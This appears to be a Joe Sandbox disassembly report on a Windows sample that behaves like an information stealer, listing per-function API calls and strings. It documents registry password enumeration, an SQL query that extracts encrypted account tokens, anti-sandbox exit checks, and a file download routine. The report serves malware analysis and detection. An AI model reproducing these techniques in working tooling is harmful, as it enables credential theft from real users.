Opcode ID: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

\, xrefs: 004141FD
:, xrefs: 004141F9
C, xrefs: 004141E9

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,043769F0,00000000,?,0041D774,00000000,?,00000000,00000000,?,043769C0), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

@, xrefs: 0041498A
%d MB, xrefs: 004149E0

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,04370BC0), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

AccountId, xrefs: 0040B472
SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B319
AccountTokens, xrefs: 0040B28A

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 0dfaf801bfec00c2bc2ebe50847e2035671af3c91b46ad4f7e3196e360e0a54e
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: 0dfaf801bfec00c2bc2ebe50847e2035671af3c91b46ad4f7e3196e360e0a54e
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04352970), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04352988), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043528E0), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043528F8), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04352928), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,0436D970), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043542B8), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043543D8), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04370370), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04370340), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04370430), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04370220), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,043544D8), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04370448), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

GetUserDefaultLangID.KERNEL32 ref: 004136E6

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04370930,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0436D980,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0436D980,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: c68b81ff4b05b1a0ab45a4ca2bc7cc5aeaafa69d51f1164b6b186f3869907372
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: c68b81ff4b05b1a0ab45a4ca2bc7cc5aeaafa69d51f1164b6b186f3869907372
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,04376C18,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,04376B28,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,04377710,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,04378B28,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,04378B40), ref: 00411E2B

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04378208,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: bd2aad392ddce8e509498b497cec8cbdfa1914d96ed247c75ddc5ef3103a8c15
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: bd2aad392ddce8e509498b497cec8cbdfa1914d96ed247c75ddc5ef3103a8c15
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04378208,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
